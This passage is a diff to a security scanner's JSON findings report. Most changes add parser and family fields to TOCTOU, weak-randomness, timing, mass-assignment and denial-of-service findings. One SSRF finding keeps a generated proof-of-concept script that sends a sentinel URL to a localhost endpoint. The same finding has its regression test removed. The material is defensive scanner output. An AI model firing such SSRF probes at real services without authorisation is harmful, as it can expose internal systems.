  "narrative": "Weak Randomness on `poc-generator.js:257` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4758
- }
4833
+ },
4834
+ "parser": "LOGIC",
4835
+ "family": null
4759
4836
  },
4760
4837
  {
4761
4838
  "id": "logic:policy-gate.js:154:TOCTOU:_existsSync_followed_by_file_op",
@@ -4836,7 +4913,9 @@
4836
4913
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4837
4914
  "confidence": "low",
4838
4915
  "narrative": "TOCTOU: existsSync followed by file op on `policy-gate.js:154` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4839
- }
4916
+ },
4917
+ "parser": "LOGIC",
4918
+ "family": null
4840
4919
  },
4841
4920
  {
4842
4921
  "id": "logic:profile.js:45:TOCTOU:_existsSync_followed_by_file_op",
@@ -4917,7 +4996,9 @@
4917
4996
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4918
4997
  "confidence": "low",
4919
4998
  "narrative": "TOCTOU: existsSync followed by file op on `profile.js:45` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4920
- }
4999
+ },
5000
+ "parser": "LOGIC",
5001
+ "family": null
4921
5002
  },
4922
5003
  {
4923
5004
  "id": "logic:router.js:21:TOCTOU:_existsSync_followed_by_file_op",
@@ -4998,7 +5079,9 @@
4998
5079
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4999
5080
  "confidence": "low",
5000
5081
  "narrative": "TOCTOU: existsSync followed by file op on `router.js:21` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5001
- }
5082
+ },
5083
+ "parser": "LOGIC",
5084
+ "family": null
5002
5085
  },
5003
5086
  {
5004
5087
  "id": "logic:rule-overrides.js:23:TOCTOU:_existsSync_followed_by_file_op",
@@ -5079,7 +5162,9 @@
5079
5162
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5080
5163
  "confidence": "low",
5081
5164
  "narrative": "TOCTOU: existsSync followed by file op on `rule-overrides.js:23` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5082
- }
5165
+ },
5166
+ "parser": "LOGIC",
5167
+ "family": null
5083
5168
  },
5084
5169
  {
5085
5170
  "id": "logic:rule-overrides.js:73:TOCTOU:_existsSync_followed_by_file_op",
@@ -5160,7 +5245,9 @@
5160
5245
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5161
5246
  "confidence": "low",
5162
5247
  "narrative": "TOCTOU: existsSync followed by file op on `rule-overrides.js:73` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5163
- }
5248
+ },
5249
+ "parser": "LOGIC",
5250
+ "family": null
5164
5251
  },
5165
5252
  {
5166
5253
  "id": "294af777c35ee12d",
@@ -5241,7 +5328,9 @@
5241
5328
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5242
5329
  "confidence": "low",
5243
5330
  "narrative": "Timing Oracle — Non-Constant-Time Secret Comparison on `rule-pack-signing.js:72` could expose production credentials and API keys. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $24k · likely $138k · worst $778k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5244
- }
5331
+ },
5332
+ "parser": "LOGIC",
5333
+ "family": null
5245
5334
  },
5246
5335
  {
5247
5336
  "id": "7cafc7b67b2d3edb",
@@ -5322,7 +5411,9 @@
5322
5411
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5323
5412
  "confidence": "low",
5324
5413
  "narrative": "Timing Oracle — Non-Constant-Time Secret Comparison on `rule-pack-signing.js:132` could expose production credentials and API keys. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $24k · likely $138k · worst $778k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5325
- }
5414
+ },
5415
+ "parser": "LOGIC",
5416
+ "family": null
5326
5417
  },
5327
5418
  {
5328
5419
  "id": "logic:rule-pack-signing.js:67:TOCTOU:_existsSync_followed_by_file_op",
@@ -5403,7 +5494,9 @@
5403
5494
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5404
5495
  "confidence": "low",
5405
5496
  "narrative": "TOCTOU: existsSync followed by file op on `rule-pack-signing.js:67` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5406
- }
5497
+ },
5498
+ "parser": "LOGIC",
5499
+ "family": null
5407
5500
  },
5408
5501
  {
5409
5502
  "id": "logic:rule-synthesis.js:24:TOCTOU:_existsSync_followed_by_file_op",
@@ -5484,7 +5577,9 @@
5484
5577
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5485
5578
  "confidence": "low",
5486
5579
  "narrative": "TOCTOU: existsSync followed by file op on `rule-synthesis.js:24` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5487
- }
5580
+ },
5581
+ "parser": "LOGIC",
5582
+ "family": null
5488
5583
  },
5489
5584
  {
5490
5585
  "id": "logic:ruleset-version.js:36:TOCTOU:_existsSync_followed_by_file_op",
@@ -5565,7 +5660,9 @@
5565
5660
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5566
5661
  "confidence": "low",
5567
5662
  "narrative": "TOCTOU: existsSync followed by file op on `ruleset-version.js:36` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5568
- }
5663
+ },
5664
+ "parser": "LOGIC",
5665
+ "family": null
5569
5666
  },
5570
5667
  {
5571
5668
  "id": "logic:suppressions.js:26:TOCTOU:_existsSync_followed_by_file_op",
@@ -5646,7 +5743,9 @@
5646
5743
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5647
5744
  "confidence": "low",
5648
5745
  "narrative": "TOCTOU: existsSync followed by file op on `suppressions.js:26` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5649
- }
5746
+ },
5747
+ "parser": "LOGIC",
5748
+ "family": null
5650
5749
  },
5651
5750
  {
5652
5751
  "id": "logic:suppressions.js:57:TOCTOU:_existsSync_followed_by_file_op",
@@ -5727,7 +5826,9 @@
5727
5826
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5728
5827
  "confidence": "low",
5729
5828
  "narrative": "TOCTOU: existsSync followed by file op on `suppressions.js:57` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5730
- }
5829
+ },
5830
+ "parser": "LOGIC",
5831
+ "family": null
5731
5832
  },
5732
5833
  {
5733
5834
  "id": "logic:telemetry-ingest.js:41:TOCTOU:_existsSync_followed_by_file_op",
@@ -5808,7 +5909,9 @@
5808
5909
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5809
5910
  "confidence": "low",
5810
5911
  "narrative": "TOCTOU: existsSync followed by file op on `telemetry-ingest.js:41` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5811
- }
5912
+ },
5913
+ "parser": "LOGIC",
5914
+ "family": null
5812
5915
  },
5813
5916
  {
5814
5917
  "id": "logic:triage.js:18:TOCTOU:_existsSync_followed_by_file_op",
@@ -5889,7 +5992,9 @@
5889
5992
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5890
5993
  "confidence": "low",
5891
5994
  "narrative": "TOCTOU: existsSync followed by file op on `triage.js:18` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5892
- }
5995
+ },
5996
+ "parser": "LOGIC",
5997
+ "family": null
5893
5998
  },
5894
5999
  {
5895
6000
  "id": "logic:validator-metrics.js:35:TOCTOU:_existsSync_followed_by_file_op",
@@ -5970,7 +6075,9 @@
5970
6075
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
5971
6076
  "confidence": "low",
5972
6077
  "narrative": "TOCTOU: existsSync followed by file op on `validator-metrics.js:35` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
5973
- }
6078
+ },
6079
+ "parser": "LOGIC",
6080
+ "family": null
5974
6081
  },
5975
6082
  {
5976
6083
  "id": "logic:verifier-target.js:66:TOCTOU:_existsSync_followed_by_file_op",
@@ -6051,7 +6158,9 @@
6051
6158
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6052
6159
  "confidence": "low",
6053
6160
  "narrative": "TOCTOU: existsSync followed by file op on `verifier-target.js:66` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6054
- }
6161
+ },
6162
+ "parser": "LOGIC",
6163
+ "family": null
6055
6164
  },
6056
6165
  {
6057
6166
  "id": "logic:version.js:43:TOCTOU:_existsSync_followed_by_file_op",
@@ -6132,7 +6241,9 @@
6132
6241
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6133
6242
  "confidence": "low",
6134
6243
  "narrative": "TOCTOU: existsSync followed by file op on `version.js:43` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6135
- }
6244
+ },
6245
+ "parser": "LOGIC",
6246
+ "family": null
6136
6247
  },
6137
6248
  {
6138
6249
  "id": "0f41f0071a156a78",
@@ -6213,7 +6324,9 @@
6213
6324
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6214
6325
  "confidence": "low",
6215
6326
  "narrative": "Weak Randomness on `waf-ingest.js:85` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6216
- }
6327
+ },
6328
+ "parser": "LOGIC",
6329
+ "family": null
6217
6330
  },
6218
6331
  {
6219
6332
  "id": "7e68ef46e5a43e74",
@@ -6294,7 +6407,9 @@
6294
6407
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6295
6408
  "confidence": "low",
6296
6409
  "narrative": "Weak Randomness on `waf-ingest.js:95` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6297
- }
6410
+ },
6411
+ "parser": "LOGIC",
6412
+ "family": null
6298
6413
  },
6299
6414
  {
6300
6415
  "id": "logic:waf-ingest.js:138:TOCTOU:_existsSync_followed_by_file_op",
@@ -6375,7 +6490,9 @@
6375
6490
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
6376
6491
  "confidence": "low",
6377
6492
  "narrative": "TOCTOU: existsSync followed by file op on `waf-ingest.js:138` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
6378
- }
6493
+ },
6494
+ "parser": "LOGIC",
6495
+ "family": null
6379
6496
  },
6380
6497
  {
6381
6498
  "id": "ssrf-meta-hardcoded:attack-playbooks.js:72",
@@ -6487,15 +6604,16 @@
6487
6604
  "unvalidated": true,
6488
6605
  "cross_language": false,
6489
6606
  "family": "ssrf",
6607
+ "parser": "SSRF-METADATA",
6490
6608
  "_unsigned": false,
6491
6609
  "_passThroughSigning": false,
6492
6610
  "signatureStatus": "verified",
6493
6611
  "regression_test": {
6494
6612
  "lang": "node",
6495
- "framework": "jest",
6496
- "filename": "security_80d409f9041d48c2.test.mjs",
6497
- "runHint": "npx jest",
6498
- "code": "// Regression test for SSRF: explicit reference to cloud instance-metadata endpoint (CWE-918).\n// Auto-generated from P1.1 PoC; fails on vulnerable code, passes after the fix.\n\nimport { test, expect } from '@jest/globals';\n\ntest('SSRF: explicit reference to cloud instance-metadata endpoint', async () => {\n const URL_ = \"http://localhost:3000/api/users/2\";\n const METHOD = \"GET\";\n const PAYLOAD = \"http://127.0.0.1:65533/poc-ssrf-sentinel\";\n const body = METHOD === 'GET' ? null : JSON.stringify({ input: PAYLOAD });\n const reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + 'input=' + encodeURIComponent(PAYLOAD)\n : URL_;\n const r = await fetch(reqUrl, { method: METHOD, headers: { 'Content-Type': 'application/json' }, body });\n const text = await r.text();\n // The assertion below is the \"exploit demonstrated\" signal — when this\n // test PASSES, the vuln is still present. After the fix, this assertion\n // SHOULD fail. Inverse the assertion in a green build.\n const demonstrated = text.includes('PoC') || /syntax error/i.test(text) || text.includes('<script>');\n expect(demonstrated).toBe(false);\n});\n"
6613
+ "framework": null,
6614
+ "filename": null,
6615
+ "runHint": null,
6616
+ "code": null
6499
6617
  },
6500
6618
  "poc": {
6501
6619
  "lang": "node",
@@ -6503,7 +6621,10 @@
6503
6621
  "cwe": "CWE-918",
6504
6622
  "family": "ssrf",
6505
6623
  "runHint": "node poc.mjs",
6506
- "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: GET http://localhost:3000/api/users/2\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/api/users/2\";\nconst METHOD = \"GET\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n"
6624
+ "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: GET http://localhost:3000/api/users/2\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/api/users/2\";\nconst METHOD = \"GET\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n",
6625
+ "paramKey": "input",
6626
+ "paramKeyConfidence": "low",
6627
+ "paramKeyInferred": false
6507
6628
  },
6508
6629
  "calibrated_confidence": null,
6509
6630
  "calibrated_confidence_ci": null,
@@ -6733,6 +6854,7 @@
6733
6854
  "unvalidated": true,
6734
6855
  "cross_language": false,
6735
6856
  "family": "mass-assignment",
6857
+ "parser": "STRUCTURAL",
6736
6858
  "_unsigned": false,
6737
6859
  "_passThroughSigning": false,
6738
6860
  "signatureStatus": "verified",
@@ -6967,6 +7089,7 @@
6967
7089
  "unvalidated": true,
6968
7090
  "cross_language": false,
6969
7091
  "family": "mass-assignment",
7092
+ "parser": "STRUCTURAL",
6970
7093
  "_unsigned": false,
6971
7094
  "_passThroughSigning": false,
6972
7095
  "signatureStatus": "verified",
@@ -7201,6 +7324,7 @@
7201
7324
  "unvalidated": true,
7202
7325
  "cross_language": false,
7203
7326
  "family": "dos-sync-io",
7327
+ "parser": "STRUCTURAL",
7204
7328
  "_unsigned": false,
7205
7329
  "_passThroughSigning": false,
7206
7330
  "signatureStatus": "verified",
@@ -7430,6 +7554,7 @@
7430
7554
  "unvalidated": true,
7431
7555
  "cross_language": false,
7432
7556
  "family": "dos-sync-io",
7557
+ "parser": "STRUCTURAL",
7433
7558
  "_unsigned": false,
7434
7559
  "_passThroughSigning": false,
7435
7560
  "signatureStatus": "verified",
@@ -7659,6 +7784,7 @@
7659
7784
  "unvalidated": true,
7660
7785
  "cross_language": false,
7661
7786
  "family": "dos-sync-io",
7787
+ "parser": "STRUCTURAL",
7662
7788
  "_unsigned": false,
7663
7789
  "_passThroughSigning": false,
7664
7790
  "signatureStatus": "verified",
@@ -7888,6 +8014,7 @@
7888
8014
  "unvalidated": true,
7889
8015
  "cross_language": false,
7890
8016
  "family": "dos-sync-io",
8017
+ "parser": "STRUCTURAL",
7891
8018
  "_unsigned": false,
7892
8019
  "_passThroughSigning": false,
7893
8020
  "signatureStatus": "verified",
@@ -8117,6 +8244,7 @@
8117
8244
  "unvalidated": true,
8118
8245
  "cross_language": false,
8119
8246
  "family": "dos-sync-io",
8247
+ "parser": "STRUCTURAL",
8120
8248
  "_unsigned": false,
8121
8249
  "_passThroughSigning": false,
8122
8250
  "signatureStatus": "verified",
@@ -8346,6 +8474,7 @@
8346
8474
  "unvalidated": true,
8347
8475
  "cross_language": false,
8348
8476
  "family": "dos-sync-io",
8477
+ "parser": "STRUCTURAL",
8349
8478
  "_unsigned": false,
8350
8479
  "_passThroughSigning": false,
8351
8480
  "signatureStatus": "verified",
@@ -8575,6 +8704,7 @@
8575
8704
  "unvalidated": true,
8576
8705
  "cross_language": false,
8577
8706
  "family": "dos-sync-io",
8707
+ "parser": "STRUCTURAL",
8578
8708
  "_unsigned": false,
8579
8709
  "_passThroughSigning": false,
8580
8710
  "signatureStatus": "verified",
@@ -8804,6 +8934,7 @@
8804
8934
  "unvalidated": true,
8805
8935
  "cross_language": false,
8806
8936
  "family": "dos-sync-io",
8937
+ "parser": "STRUCTURAL",
8807
8938
  "_unsigned": false,
8808
8939
  "_passThroughSigning": false,
8809
8940
  "signatureStatus": "verified",
@@ -9033,6 +9164,7 @@
9033
9164
  "unvalidated": true,
9034
9165
  "cross_language": false,
9035
9166
  "family": "dos-sync-io",
9167
+ "parser": "STRUCTURAL",
9036
9168
  "_unsigned": false,
9037
9169
  "_passThroughSigning": false,
9038
9170
  "signatureStatus": "verified",
@@ -9262,6 +9394,7 @@
9262
9394
  "unvalidated": true,
9263
9395
  "cross_language": false,
9264
9396
  "family": "dos-sync-io",
9397
+ "parser": "STRUCTURAL",
9265
9398
  "_unsigned": false,
9266
9399
  "_passThroughSigning": false,
9267
9400
  "signatureStatus": "verified",
@@ -9493,6 +9626,7 @@
9493
9626
  "unvalidated": true,
9494
9627
  "cross_language": false,
9495
9628
  "family": "dos-sync-io",
9629
+ "parser": "STRUCTURAL",
9496
9630
  "_unsigned": false,
9497
9631
  "_passThroughSigning": false,
9498
9632
  "signatureStatus": "verified",
@@ -9724,6 +9858,7 @@
9724
9858
  "unvalidated": true,
9725
9859
  "cross_language": false,
9726
9860
  "family": "dos-sync-io",
9861
+ "parser": "STRUCTURAL",
9727
9862
  "_unsigned": false,
9728
9863
  "_passThroughSigning": false,
9729
9864
  "signatureStatus": "verified",
@@ -9957,6 +10092,7 @@
9957
10092
  "unvalidated": true,
9958
10093
  "cross_language": false,
9959
10094
  "family": "dos-sync-io",
10095
+ "parser": "STRUCTURAL",
9960
10096
  "_unsigned": false,
9961
10097
  "_passThroughSigning": false,
9962
10098
  "signatureStatus": "verified",
@@ -10190,6 +10326,7 @@
10190
10326
  "unvalidated": true,
10191
10327
  "cross_language": false,
10192
10328
  "family": "dos-sync-io",
10329
+ "parser": "STRUCTURAL",
10193
10330
  "_unsigned": false,
10194
10331
  "_passThroughSigning": false,
10195
10332
  "signatureStatus": "verified",
@@ -10423,6 +10560,7 @@
10423
10560
  "unvalidated": true,
10424
10561
  "cross_language": false,
10425
10562
  "family": "dos-sync-io",
10563
+ "parser": "STRUCTURAL",
10426
10564
  "_unsigned": false,
10427
10565
  "_passThroughSigning": false,
10428
10566
  "signatureStatus": "verified",
@@ -10656,6 +10794,7 @@
10656
10794
  "unvalidated": true,
10657
10795
  "cross_language": false,
10658
10796
  "family": "dos-sync-io",
10797
+ "parser": "STRUCTURAL",
10659
10798
  "_unsigned": false,
10660
10799
  "_passThroughSigning": false,
10661
10800
  "signatureStatus": "verified",
@@ -10889,6 +11028,7 @@
10889
11028
  "unvalidated": true,
10890
11029
  "cross_language": false,
10891
11030
  "family": "dos-sync-io",
11031
+ "parser": "STRUCTURAL",
10892
11032
  "_unsigned": false,
10893
11033
  "_passThroughSigning": false,
10894
11034
  "signatureStatus": "verified",
@@ -11122,6 +11262,7 @@
11122
11262
  "unvalidated": true,
11123
11263
  "cross_language": false,
11124
11264
  "family": "dos-sync-io",
11265
+ "parser": "STRUCTURAL",
11125
11266
  "_unsigned": false,
11126
11267
  "_passThroughSigning": false,
11127
11268
  "signatureStatus": "verified",
@@ -11355,6 +11496,7 @@
11355
11496
  "unvalidated": true,
11356
11497
  "cross_language": false,
11357
11498
  "family": "dos-sync-io",
11499
+ "parser": "STRUCTURAL",
11358
11500
  "_unsigned": false,
11359
11501
  "_passThroughSigning": false,
11360
11502
  "signatureStatus": "verified",
@@ -11588,6 +11730,7 @@
11588
11730
  "unvalidated": true,
11589
11731
  "cross_language": false,
11590
11732
  "family": "dos-sync-io",
11733
+ "parser": "STRUCTURAL",
11591
11734
  "_unsigned": false,
11592
11735
  "_passThroughSigning": false,
11593
11736
  "signatureStatus": "verified",
@@ -11821,6 +11964,7 @@
11821
11964
  "unvalidated": true,
11822
11965
  "cross_language": false,
11823
11966
  "family": "dos-sync-io",
11967
+ "parser": "STRUCTURAL",
11824
11968
  "_unsigned": false,
11825
11969
  "_passThroughSigning": false,
11826
11970
  "signatureStatus": "verified",
@@ -12054,6 +12198,7 @@
12054
12198
  "unvalidated": true,
12055
12199
  "cross_language": false,
12056
12200
  "family": "dos-sync-io",
12201
+ "parser": "STRUCTURAL",
12057
12202
  "_unsigned": false,
12058
12203
  "_passThroughSigning": false,
12059
12204
  "signatureStatus": "verified",
@@ -12283,6 +12428,7 @@
12283
12428
  "unvalidated": true,
12284
12429
  "cross_language": false,
12285
12430
  "family": "dos-sync-io",
12431
+ "parser": "STRUCTURAL",
12286
12432
  "_unsigned": false,
12287
12433
  "_passThroughSigning": false,
12288
12434
  "signatureStatus": "verified",
@@ -12512,6 +12658,7 @@
12512
12658
  "unvalidated": true,
12513
12659
  "cross_language": false,
12514
12660
  "family": "dos-sync-io",
12661
+ "parser": "STRUCTURAL",
12515
12662
  "_unsigned": false,
12516
12663
  "_passThroughSigning": false,
12517
12664
  "signatureStatus": "verified",
@@ -12547,7 +12694,7 @@
12547
12694
  "cloneClusterId": "29d998f79544cba7",
12548
12695
  "cloneClusterSize": 7,
12549
12696
  "provenance": "mixed",
12550
- "provenanceScore": 0.3,
12697
+ "provenanceScore": 0.34,
12551
12698
  "typeNarrowed": null,
12552
12699
  "strideCategory": "denialOfService",
12553
12700
  "personaScores": {
@@ -12741,6 +12888,7 @@
12741
12888
  "unvalidated": true,
12742
12889
  "cross_language": false,
12743
12890
  "family": "dos-sync-io",
12891
+ "parser": "STRUCTURAL",
12744
12892
  "_unsigned": false,
12745
12893
  "_passThroughSigning": false,
12746
12894
  "signatureStatus": "verified",
@@ -12776,7 +12924,7 @@
12776
12924
  "cloneClusterId": "cc47a2e427e15347",
12777
12925
  "cloneClusterSize": 2,
12778
12926
  "provenance": "mixed",
12779
- "provenanceScore": 0.3,
12927
+ "provenanceScore": 0.34,
12780
12928
  "typeNarrowed": null,
12781
12929
  "strideCategory": "denialOfService",
12782
12930
  "personaScores": {
@@ -12970,6 +13118,7 @@
12970
13118
  "unvalidated": true,
12971
13119
  "cross_language": false,
12972
13120
  "family": "dos-sync-io",
13121
+ "parser": "STRUCTURAL",
12973
13122
  "_unsigned": false,
12974
13123
  "_passThroughSigning": false,
12975
13124
  "signatureStatus": "verified",
@@ -13201,6 +13350,7 @@
13201
13350
  "unvalidated": true,
13202
13351
  "cross_language": false,
13203
13352
  "family": "dos-sync-io",
13353
+ "parser": "STRUCTURAL",
13204
13354
  "_unsigned": false,
13205
13355
  "_passThroughSigning": false,
13206
13356
  "signatureStatus": "verified",
@@ -13432,6 +13582,7 @@
13432
13582
  "unvalidated": true,
13433
13583
  "cross_language": false,
13434
13584
  "family": "dos-sync-io",
13585
+ "parser": "STRUCTURAL",
13435
13586
  "_unsigned": false,
13436
13587
  "_passThroughSigning": false,
13437
13588
  "signatureStatus": "verified",
@@ -13663,6 +13814,7 @@
13663
13814
  "unvalidated": true,
13664
13815
  "cross_language": false,
13665
13816
  "family": "dos-sync-io",
13817
+ "parser": "STRUCTURAL",
13666
13818
  "_unsigned": false,
13667
13819
  "_passThroughSigning": false,
13668
13820
  "signatureStatus": "verified",
@@ -13894,6 +14046,7 @@
13894
14046
  "unvalidated": true,
13895
14047
  "cross_language": false,
13896
14048
  "family": "dos-sync-io",
14049
+ "parser": "STRUCTURAL",
13897
14050
  "_unsigned": false,
13898
14051
  "_passThroughSigning": false,
13899
14052
  "signatureStatus": "verified",
@@ -14125,6 +14278,7 @@
14125
14278
  "unvalidated": true,
14126
14279
  "cross_language": false,
14127
14280
  "family": "dos-sync-io",
14281
+ "parser": "STRUCTURAL",
14128
14282
  "_unsigned": false,
14129
14283
  "_passThroughSigning": false,
14130
14284
  "signatureStatus": "verified",
@@ -14356,6 +14510,7 @@
14356
14510
  "unvalidated": true,
14357
14511
  "cross_language": false,
14358
14512
  "family": "dos-sync-io",
14513
+ "parser": "STRUCTURAL",
14359
14514
  "_unsigned": false,
14360
14515
  "_passThroughSigning": false,
14361
14516
  "signatureStatus": "verified",
@@ -14587,6 +14742,7 @@
14587
14742
  "unvalidated": true,
14588
14743
  "cross_language": false,
14589
14744
  "family": "dos-sync-io",
14745
+ "parser": "STRUCTURAL",
14590
14746
  "_unsigned": false,
14591
14747
  "_passThroughSigning": false,
14592
14748
  "signatureStatus": "verified",
@@ -14818,6 +14974,7 @@
14818
14974
  "unvalidated": true,
14819
14975
  "cross_language": false,
14820
14976
  "family": "dos-sync-io",
14977
+ "parser": "STRUCTURAL",
14821
14978
  "_unsigned": false,
14822
14979
  "_passThroughSigning": false,
14823
14980
  "signatureStatus": "verified",
@@ -15049,6 +15206,7 @@
15049
15206
  "unvalidated": true,
15050
15207
  "cross_language": false,
15051
15208
  "family": "dos-sync-io",
15209
+ "parser": "STRUCTURAL",
15052
15210
  "_unsigned": false,
15053
15211
  "_passThroughSigning": false,
15054
15212
  "signatureStatus": "verified",
@@ -15280,6 +15438,7 @@
15280
15438
  "unvalidated": true,
15281
15439
  "cross_language": false,
15282
15440
  "family": "dos-sync-io",
15441
+ "parser": "STRUCTURAL",
15283
15442
  "_unsigned": false,
15284
15443
  "_passThroughSigning": false,
15285
15444
  "signatureStatus": "verified",
@@ -15511,6 +15670,7 @@
15511
15670
  "unvalidated": true,
15512
15671
  "cross_language": false,
15513
15672
  "family": "dos-sync-io",
15673
+ "parser": "STRUCTURAL",
15514
15674
  "_unsigned": false,
